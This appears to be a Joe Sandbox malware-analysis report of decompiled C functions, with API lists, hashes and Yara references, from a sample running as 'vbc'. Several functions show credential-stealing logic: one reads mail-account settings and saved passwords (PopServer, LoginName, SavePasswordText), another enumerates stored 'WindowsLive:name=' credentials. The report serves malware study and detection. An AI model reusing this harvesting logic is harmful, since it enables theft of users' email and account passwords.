                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                        • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                        • API String ID: 3198317522-572158859
                                                                                                                                                                        • Opcode ID: 5f56a8b7da271a810a769b22d2f728ab30919581b98e2cd5870482cf17005fbc
                                                                                                                                                                        • Instruction ID: ee7e3b4bfe4f381a5a8dca6b6b4a58a66687d49b648cda9812902ba604a22f70
                                                                                                                                                                        • Opcode Fuzzy Hash: 5f56a8b7da271a810a769b22d2f728ab30919581b98e2cd5870482cf17005fbc
                                                                                                                                                                        • Instruction Fuzzy Hash: DC01D432604214BEEB245B61DC46EDF7E68EB09796B20403AF602B41D0DA759F40DADC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040831F Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                        			E0040831F(void* __eflags, char* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00406155(_a4);
				if(_t3 != 0) {
					strcpy(0x4181b8, _a4);
					strcpy(0x4182c0, "general");
					_t6 = GetPrivateProfileIntA(0x4182c0, "rtl", 0, 0x4181b8);
					asm("sbb eax, eax");
					 *0x418304 =  ~(_t6 - 1) + 1;
					E00407F2B(0x418308, "charset", 0x3f);
					E00407F2B(0x418348, "TranslatorName", 0x3f);
					return E00407F2B(0x418388, "TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                                                                        0x00408323
                                                                                                                                                                        0x0040832b
                                                                                                                                                                        0x00408339
                                                                                                                                                                        0x00408349
                                                                                                                                                                        0x0040835a
                                                                                                                                                                        0x00408363
                                                                                                                                                                        0x00408372
                                                                                                                                                                        0x00408377
                                                                                                                                                                        0x00408388
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004083a5
                                                                                                                                                                        0x004083a6

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406155: GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                                                                                                                                                                        • strcpy.MSVCRT(004181B8,00000000,00000000,00000000,004083DE,00000000,?,00000000,00000104,?), ref: 00408339
                                                                                                                                                                        • strcpy.MSVCRT(004182C0,general,004181B8,00000000,00000000,00000000,004083DE,00000000,?,00000000,00000104,?), ref: 00408349
                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 0040835A
                                                                                                                                                                          • Part of subcall function 00407F2B: GetPrivateProfileStringA.KERNEL32(004182C0,?,0041344F,00418308,?,004181B8), ref: 00407F46
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfilestrcpy$AttributesFileString
                                                                                                                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                        • API String ID: 185930432-2039793938
                                                                                                                                                                        • Opcode ID: 096529db9ad1171b6712faedd0256edc65327acc83deb5f5860257c904a951f2
                                                                                                                                                                        • Instruction ID: 927989a77509199662194d441518c64dc34f1856eccff2a3d84bf87df20cc289
                                                                                                                                                                        • Opcode Fuzzy Hash: 096529db9ad1171b6712faedd0256edc65327acc83deb5f5860257c904a951f2
                                                                                                                                                                        • Instruction Fuzzy Hash: 00F0C232EC421539C62036615C07FEA3A148BE2F10F08447FBD04B61C2EA7D49D1815E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004088C6 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                        			E004088C6(void* __eax, void* __eflags, signed int _a4, short _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t96;
				signed int _t98;
				void* _t99;
				signed int _t104;
				signed short _t107;
				signed int _t110;
				intOrPtr _t114;
				signed int _t117;
				signed int _t119;
				signed short _t121;
				signed int _t122;
				signed int _t152;
				signed int _t156;
				signed int _t158;
				signed int _t161;
				signed int _t163;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t178;
				intOrPtr _t180;

				_t174 = __eflags;
				_t172 = __eax;
				E004086DC(__eax);
				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
				_t122 = 0xd;
				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
				_t156 = 0x14;
				_t96 = _t122 * _t156;
				 *(_t172 + 0x1b0) = _t122;
				_push( ~(0 | _t174 > 0x00000000) | _t96);
				L00412090();
				 *(_t172 + 0x1b4) = _t96;
				_t158 = 0x10;
				_t98 = _t122 * _t158;
				_push( ~(0 | _t174 > 0x00000000) | _t98);
				L00412090();
				 *(_t172 + 0x34) = _t98;
				_v8 = 0x4178e0;
				do {
					_t21 =  &_v8; // 0x4178e0
					_t99 =  *_t21;
					_t168 =  *_t99;
					_v12 = _t168;
					_t169 = _t168 * 0x14;
					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
					_t24 =  &_v8; // 0x4178e0
					_t104 = _v12 << 4;
					_v12 = _t104;
					memcpy( *(_t172 + 0x34) + _t104,  *_t24 + 0x14, 0x10);
					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
					_t173 = _t173 + 0x18;
					_v16 = _t107;
					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
					if((_t107 & 0xffff0000) == 0) {
						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E00407A69(_t107 & 0x0000ffff);
						_t121 = E00407A69(_v16 | 0x00010000);
						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
						_t122 = 0xd;
					}
					_v8 = _v8 + 0x24;
					_t178 = _v8 - 0x417ab4;
				} while (_t178 < 0);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
				_t161 = 4;
				_t110 = _t122 * _t161;
				 *(_t172 + 0x20) = _t122;
				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
				_push( ~(0 | _t178 > 0x00000000) | _t110);
				L00412090();
				_push(0xc);
				 *(_t172 + 0x24) = _t110;
				L00412090();
				_t170 = _t110;
				if(_t170 == 0) {
					_t170 = 0;
					__eflags = 0;
				} else {
					_t114 =  *((intOrPtr*)(_t172 + 0x48));
					_t180 = _t114;
					_a8 = _t114;
					if(_t180 == 0) {
						_a8 = 0x64;
					}
					 *((intOrPtr*)(_t170 + 8)) = _a4;
					_t163 = 4;
					_t117 = _t122 * _t163;
					 *(_t170 + 4) = _t122;
					_push( ~(0 | _t180 > 0x00000000) | _t117);
					L00412090();
					_a4 = _a4 & 0x00000000;
					 *_t170 = _t117;
					do {
						_t152 = _a4;
						_t119 = _t152 << 2;
						_a4 = _a4 + 1;
						 *( *_t170 + _t119 + 2) = _t152;
						 *((short*)(_t119 +  *_t170)) = _a8;
					} while (_a4 < _t122);
				}
				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
				 *(_t172 + 0x1a0) = _t170;
				 *((intOrPtr*)(_t172 + 0x40)) = 1;
				 *((intOrPtr*)(_t172 + 0x198)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
				return E00408846(_t172);
			}

































                                                                                                                                                                        0x004088c6
                                                                                                                                                                        0x004088cf
                                                                                                                                                                        0x004088d1
                                                                                                                                                                        0x004088d9
                                                                                                                                                                        0x004088df
                                                                                                                                                                        0x004088e0
                                                                                                                                                                        0x004088ea
                                                                                                                                                                        0x004088ed
                                                                                                                                                                        0x004088f2
                                                                                                                                                                        0x004088fc
                                                                                                                                                                        0x004088fd
                                                                                                                                                                        0x00408902
                                                                                                                                                                        0x0040890c
                                                                                                                                                                        0x0040890f
                                                                                                                                                                        0x00408918
                                                                                                                                                                        0x00408919
                                                                                                                                                                        0x00408920
                                                                                                                                                                        0x00408923
                                                                                                                                                                        0x0040892a
                                                                                                                                                                        0x0040892a
                                                                                                                                                                        0x0040892a
                                                                                                                                                                        0x0040892d
                                                                                                                                                                        0x0040892f
                                                                                                                                                                        0x00408932
                                                                                                                                                                        0x00408941
                                                                                                                                                                        0x00408946
                                                                                                                                                                        0x00408955
                                                                                                                                                                        0x0040895b
                                                                                                                                                                        0x0040895e
                                                                                                                                                                        0x00408969
                                                                                                                                                                        0x00408973
                                                                                                                                                                        0x0040897b
                                                                                                                                                                        0x0040897e
                                                                                                                                                                        0x00408982
                                                                                                                                                                        0x0040899b
                                                                                                                                                                        0x0040899f
                                                                                                                                                                        0x004089ac
                                                                                                                                                                        0x004089b0
                                                                                                                                                                        0x004089b0
                                                                                                                                                                        0x004089b1
                                                                                                                                                                        0x004089b5
                                                                                                                                                                        0x004089b5
                                                                                                                                                                        0x004089c5
                                                                                                                                                                        0x004089c9
                                                                                                                                                                        0x004089d0
                                                                                                                                                                        0x004089d3
                                                                                                                                                                        0x004089d8
                                                                                                                                                                        0x004089db
                                                                                                                                                                        0x004089e6
                                                                                                                                                                        0x004089e7
                                                                                                                                                                        0x004089ec
                                                                                                                                                                        0x004089ee
                                                                                                                                                                        0x004089f1
                                                                                                                                                                        0x004089f6
                                                                                                                                                                        0x004089fc
                                                                                                                                                                        0x00408a58
                                                                                                                                                                        0x00408a58
                                                                                                                                                                        0x004089fe
                                                                                                                                                                        0x004089fe
                                                                                                                                                                        0x00408a01
                                                                                                                                                                        0x00408a03
                                                                                                                                                                        0x00408a06
                                                                                                                                                                        0x00408a08
                                                                                                                                                                        0x00408a08
                                                                                                                                                                        0x00408a12
                                                                                                                                                                        0x00408a19
                                                                                                                                                                        0x00408a1c
                                                                                                                                                                        0x00408a21
                                                                                                                                                                        0x00408a28
                                                                                                                                                                        0x00408a29
                                                                                                                                                                        0x00408a2e
                                                                                                                                                                        0x00408a33
                                                                                                                                                                        0x00408a35
                                                                                                                                                                        0x00408a35
                                                                                                                                                                        0x00408a3c
                                                                                                                                                                        0x00408a3f
                                                                                                                                                                        0x00408a45
                                                                                                                                                                        0x00408a50
                                                                                                                                                                        0x00408a50
                                                                                                                                                                        0x00408a56
                                                                                                                                                                        0x00408a5a
                                                                                                                                                                        0x00408a64
                                                                                                                                                                        0x00408a6c
                                                                                                                                                                        0x00408a6f
                                                                                                                                                                        0x00408a75
                                                                                                                                                                        0x00408a7b
                                                                                                                                                                        0x00408a81
                                                                                                                                                                        0x00408a94

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086E8
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086F6
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408707
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 0040871E
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408727
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 004088FD
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00408919
                                                                                                                                                                        • memcpy.MSVCRT ref: 00408941
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040895E
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 004089E7
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 004089F1
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00408A29
                                                                                                                                                                          • Part of subcall function 00407A69: LoadStringA.USER32 ref: 00407B32
                                                                                                                                                                          • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                                                                                                                                                                          • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,73B74DE0), ref: 00407AE4
                                                                                                                                                                          • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                                                                                                                                                                        • String ID: d$xA
                                                                                                                                                                        • API String ID: 3781940870-3129348561
                                                                                                                                                                        • Opcode ID: 5a9e4da96f2f7e0bde87e55aae0f47c2a3c86f5c95d1692b49de27a05e9aa5de
                                                                                                                                                                        • Instruction ID: 74bd4705b90376de5a47ec474c9ee228b959cea471a61b54eb6c1cdd4b9bc2c0
                                                                                                                                                                        • Opcode Fuzzy Hash: 5a9e4da96f2f7e0bde87e55aae0f47c2a3c86f5c95d1692b49de27a05e9aa5de
                                                                                                                                                                        • Instruction Fuzzy Hash: 62515C71A01704AFD724DF39C58179ABBE4EF48354F10852EE59ADB381DB74A941CF44
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00403127 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 67%
                                                                                                                                                                        			E00403127(void* __eax, intOrPtr _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v188;
				char _v268;
				char _v524;
				void* __ebx;
				void* __edi;
				char* _t53;
				void* _t60;
				void* _t65;
				char* _t70;

				_v8 = _v8 & 0x00000000;
				_t65 = __eax;
				 *((intOrPtr*)(__eax + 0x8c)) = 3;
				 *((intOrPtr*)(__eax + 0x210)) = 1;
				E004030F9(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
				if(_v524 == 0x31) {
					 *((intOrPtr*)(_t65 + 0x210)) = 2;
				}
				_v12 = _t65 + 0x110;
				E004030F9(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
				_t70 = _t65 + 0x214;
				E004030F9(_a4, "LoginName", _t70, 0x7f, _a8);
				E004030F9(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
				E004030F9(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
				E004030F9(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
				if(_v268 != 0) {
					_v188 = 0;
					E00401D19( &_v268, _t65 + 0x294);
					if( *_t70 == 0) {
						_push(_a8);
						_t60 = 0x7f;
						_push(_t60);
						_push(_t70);
						_push("PopAccount");
						_push(_a4);
						E004030F9();
						if( *_t70 != 0) {
							_t53 = strchr(_t70, 0x40);
							_a8 = _t53;
							if(_t53 != 0) {
								E004060DA(_t60, _v12,  &(_t53[1]));
								 *_a8 = 0;
							}
						}
					}
					_v8 = 1;
				}
				if( *_t70 != 0) {
					_v8 = 1;
				}
				return _v8;
			}














                                                                                                                                                                        0x00403130
                                                                                                                                                                        0x0040313a
                                                                                                                                                                        0x00403151
                                                                                                                                                                        0x0040315b
                                                                                                                                                                        0x00403165
                                                                                                                                                                        0x00403171
                                                                                                                                                                        0x00403173
                                                                                                                                                                        0x00403173
                                                                                                                                                                        0x00403191
                                                                                                                                                                        0x00403194
                                                                                                                                                                        0x0040319c
                                                                                                                                                                        0x004031ad
                                                                                                                                                                        0x004031c3
                                                                                                                                                                        0x004031dc
                                                                                                                                                                        0x004031f4
                                                                                                                                                                        0x00403200
                                                                                                                                                                        0x0040320e
                                                                                                                                                                        0x00403215
                                                                                                                                                                        0x0040321d
                                                                                                                                                                        0x0040321f
                                                                                                                                                                        0x00403224
                                                                                                                                                                        0x00403225
                                                                                                                                                                        0x00403226
                                                                                                                                                                        0x00403227
                                                                                                                                                                        0x0040322c
                                                                                                                                                                        0x0040322f
                                                                                                                                                                        0x00403237
                                                                                                                                                                        0x0040323c
                                                                                                                                                                        0x00403245
                                                                                                                                                                        0x00403248
                                                                                                                                                                        0x0040324f
                                                                                                                                                                        0x00403258
                                                                                                                                                                        0x00403258
                                                                                                                                                                        0x00403248
                                                                                                                                                                        0x00403237
                                                                                                                                                                        0x0040325b
                                                                                                                                                                        0x0040325b
                                                                                                                                                                        0x00403268
                                                                                                                                                                        0x0040326a
                                                                                                                                                                        0x0040326a
                                                                                                                                                                        0x00403275

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004030F9: GetPrivateProfileStringA.KERNEL32(00000000,?,0041344F,?,?,?), ref: 0040311D
                                                                                                                                                                        • strchr.MSVCRT ref: 0040323C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfileStringstrchr
                                                                                                                                                                        • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                        • API String ID: 1348940319-1729847305
                                                                                                                                                                        • Opcode ID: 4f3761682ac34aea950079ee6e15d32a83a9ea860df6d03b5968914b8edab4df
                                                                                                                                                                        • Instruction ID: 730259ebfdc93430ac8a7640b0a1394381beeb8186f258e339b1e1584fb818e0
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f3761682ac34aea950079ee6e15d32a83a9ea860df6d03b5968914b8edab4df
                                                                                                                                                                        • Instruction Fuzzy Hash: FF31917150420ABEEF219F60CC06FD97F6CAF10359F10806AF558761D2CBB9AB949B54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F70E Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 16%
                                                                                                                                                                        			E0040F70E(char* __eax, void* __ecx) {
				void* _t2;
				char* _t3;
				void* _t5;
				void* _t6;
				void* _t7;

				_t3 = __eax;
				_t6 = __ecx;
				_t5 = 4;
				while(1) {
					_t2 =  *_t3;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t5);
					_push("&lt;");
					L14:
					_t2 = memcpy(_t6, ??, ??);
					_t7 = _t7 + 0xc;
					_t6 = _t6 + _t5;
					L16:
					if( *_t3 != 0) {
						_t3 = _t3 + 1;
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if(_t2 != 0xb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t6 = _t2;
										_t6 = _t6 + 1;
									} else {
										_push(_t5);
										_push("<br>");
										goto L14;
									}
								} else {
									_push(5);
									_push("&amp;");
									goto L11;
								}
							} else {
								_push(5);
								_push("&deg;");
								L11:
								_t2 = memcpy(_t6, ??, ??);
								_t7 = _t7 + 0xc;
								_t6 = _t6 + 5;
							}
						} else {
							_t2 = memcpy(_t6, "&quot;", 6);
							_t7 = _t7 + 0xc;
							_t6 = _t6 + 6;
						}
					} else {
						_push(_t5);
						_push("&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                                                                        0x0040f713
                                                                                                                                                                        0x0040f715
                                                                                                                                                                        0x0040f717
                                                                                                                                                                        0x0040f718
                                                                                                                                                                        0x0040f718
                                                                                                                                                                        0x0040f71c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040f71e
                                                                                                                                                                        0x0040f71f
                                                                                                                                                                        0x0040f77b
                                                                                                                                                                        0x0040f77c
                                                                                                                                                                        0x0040f781
                                                                                                                                                                        0x0040f784
                                                                                                                                                                        0x0040f78b
                                                                                                                                                                        0x0040f78e
                                                                                                                                                                        0x0040f790
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040f790
                                                                                                                                                                        0x0040f796
                                                                                                                                                                        0x0040f726
                                                                                                                                                                        0x0040f728
                                                                                                                                                                        0x0040f734
                                                                                                                                                                        0x0040f74d
                                                                                                                                                                        0x0040f75a
                                                                                                                                                                        0x0040f773
                                                                                                                                                                        0x0040f788
                                                                                                                                                                        0x0040f78a
                                                                                                                                                                        0x0040f775
                                                                                                                                                                        0x0040f775
                                                                                                                                                                        0x0040f776
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040f776
                                                                                                                                                                        0x0040f75c
                                                                                                                                                                        0x0040f75c
                                                                                                                                                                        0x0040f75e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040f75e
                                                                                                                                                                        0x0040f74f
                                                                                                                                                                        0x0040f74f
                                                                                                                                                                        0x0040f751
                                                                                                                                                                        0x0040f763
                                                                                                                                                                        0x0040f764
                                                                                                                                                                        0x0040f769
                                                                                                                                                                        0x0040f76c
                                                                                                                                                                        0x0040f76c
                                                                                                                                                                        0x0040f736
                                                                                                                                                                        0x0040f73e
                                                                                                                                                                        0x0040f743
                                                                                                                                                                        0x0040f746
                                                                                                                                                                        0x0040f746
                                                                                                                                                                        0x0040f72a
                                                                                                                                                                        0x0040f72a
                                                                                                                                                                        0x0040f72b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040f72b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040f728

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                        • API String ID: 3510742995-3273207271
                                                                                                                                                                        • Opcode ID: 91506a718b00cdec2e45e1457c491db783313ed82e55890756c6f05279fb0cf7
                                                                                                                                                                        • Instruction ID: b4a8218c7fa3979214449631b2efcde822773b41d0541f29ded2a506b887ed0e
                                                                                                                                                                        • Opcode Fuzzy Hash: 91506a718b00cdec2e45e1457c491db783313ed82e55890756c6f05279fb0cf7
                                                                                                                                                                        • Instruction Fuzzy Hash: FF01DFB2EC465025DA7100092C86FE70A494BFAB11FB50137F98533AC4E0AD0CCF829F
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040DEC3 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 69%
                                                                                                                                                                        			E0040DEC3(intOrPtr* _a4) {
				char _v260;
				char _v516;
				void _v771;
				char _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v788;
				int _v796;
				char _v800;
				signed int _v804;
				char _v808;
				char _v812;
				void* __edi;
				void* __esi;
				intOrPtr* _t52;
				void* _t53;
				void* _t57;
				signed int _t58;
				char* _t65;
				unsigned int _t68;
				intOrPtr _t69;
				void* _t85;
				char* _t89;
				intOrPtr _t92;
				intOrPtr* _t93;
				signed int _t94;
				void* _t96;

				_t52 = _a4;
				_t96 = (_t94 & 0xfffffff8) - 0x32c;
				_push(_t85);
				 *((intOrPtr*)(_t52 + 4)) = 0;
				 *((intOrPtr*)(_t52 + 8)) = 0;
				_t89 = 0;
				_t53 = E00406282();
				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
				if( *((intOrPtr*)(_t53 + 4)) > 5) {
					_t89 = L"WindowsLive:name=*";
				}
				_v800 = 0;
				_v796 = 0;
				if(E00404651( &_v800, _t85, _t97) == 0) {
					L21:
					return E004046CC( &_v800);
				}
				_v808 = 0;
				_v812 = 0;
				if(_v780 == 0) {
					_t57 = 0;
					__eflags = 0;
				} else {
					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
				}
				if(_t57 == 0) {
					goto L21;
				} else {
					_t58 = 0;
					_v804 = 0;
					if(_v812 <= 0) {
						L20:
						_v788(_v808);
						goto L21;
					} else {
						do {
							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
								_v772 = 0;
								memset( &_v771, 0, 0xff);
								_t96 = _t96 + 0xc;
								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
									_push(0x11);
									_t65 =  &_v772;
									_push("windowslive:name=");
									_push(_t65);
									L004120D2();
									_t96 = _t96 + 0xc;
									if(_t65 == 0) {
										_v516 = 0;
										_v260 = 0;
										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
										_t68 =  *(_t92 + 0x18);
										if(_t68 > 0) {
											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
										}
										if(_v260 == 0) {
											_t69 = _a4;
											_t44 = _t69 + 8;
											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
											__eflags =  *_t44;
										} else {
											_t93 = _a4;
											 *((intOrPtr*)( *_t93 + 4))( &_v516);
											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
										}
									}
								}
							}
							_t58 = _v804 + 1;
							_v804 = _t58;
						} while (_t58 < _v812);
						goto L20;
					}
				}
			}






























                                                                                                                                                                        0x0040dec9
                                                                                                                                                                        0x0040decc
                                                                                                                                                                        0x0040ded6
                                                                                                                                                                        0x0040ded7
                                                                                                                                                                        0x0040deda
                                                                                                                                                                        0x0040dedd
                                                                                                                                                                        0x0040dedf
                                                                                                                                                                        0x0040dee4
                                                                                                                                                                        0x0040dee8
                                                                                                                                                                        0x0040deea
                                                                                                                                                                        0x0040deea
                                                                                                                                                                        0x0040def3
                                                                                                                                                                        0x0040def7
                                                                                                                                                                        0x0040df02
                                                                                                                                                                        0x0040e045
                                                                                                                                                                        0x0040e054
                                                                                                                                                                        0x0040e054
                                                                                                                                                                        0x0040df0c
                                                                                                                                                                        0x0040df10
                                                                                                                                                                        0x0040df14
                                                                                                                                                                        0x0040df28
                                                                                                                                                                        0x0040df28
                                                                                                                                                                        0x0040df16
                                                                                                                                                                        0x0040df22
                                                                                                                                                                        0x0040df22
                                                                                                                                                                        0x0040df2c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040df32
                                                                                                                                                                        0x0040df32
                                                                                                                                                                        0x0040df38
                                                                                                                                                                        0x0040df3c
                                                                                                                                                                        0x0040e03d
                                                                                                                                                                        0x0040e041
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040df42
                                                                                                                                                                        0x0040df47
                                                                                                                                                                        0x0040df4b
                                                                                                                                                                        0x0040df52
                                                                                                                                                                        0x0040df71
                                                                                                                                                                        0x0040df75
                                                                                                                                                                        0x0040df7a
                                                                                                                                                                        0x0040df94
                                                                                                                                                                        0x0040df9a
                                                                                                                                                                        0x0040df9c
                                                                                                                                                                        0x0040dfa0
                                                                                                                                                                        0x0040dfa5
                                                                                                                                                                        0x0040dfa6
                                                                                                                                                                        0x0040dfab
                                                                                                                                                                        0x0040dfb0
                                                                                                                                                                        0x0040dfc2
                                                                                                                                                                        0x0040dfcb
                                                                                                                                                                        0x0040dfd2
                                                                                                                                                                        0x0040dfd8
                                                                                                                                                                        0x0040dfdd
                                                                                                                                                                        0x0040dff2
                                                                                                                                                                        0x0040dffd
                                                                                                                                                                        0x0040dffd
                                                                                                                                                                        0x0040e00b
                                                                                                                                                                        0x0040e024
                                                                                                                                                                        0x0040e027
                                                                                                                                                                        0x0040e027
                                                                                                                                                                        0x0040e027
                                                                                                                                                                        0x0040e00d
                                                                                                                                                                        0x0040e00d
                                                                                                                                                                        0x0040e01c
                                                                                                                                                                        0x0040e01f
                                                                                                                                                                        0x0040e01f
                                                                                                                                                                        0x0040e00b
                                                                                                                                                                        0x0040dfb0
                                                                                                                                                                        0x0040df94
                                                                                                                                                                        0x0040e02e
                                                                                                                                                                        0x0040e033
                                                                                                                                                                        0x0040e033
                                                                                                                                                                        0x00000000
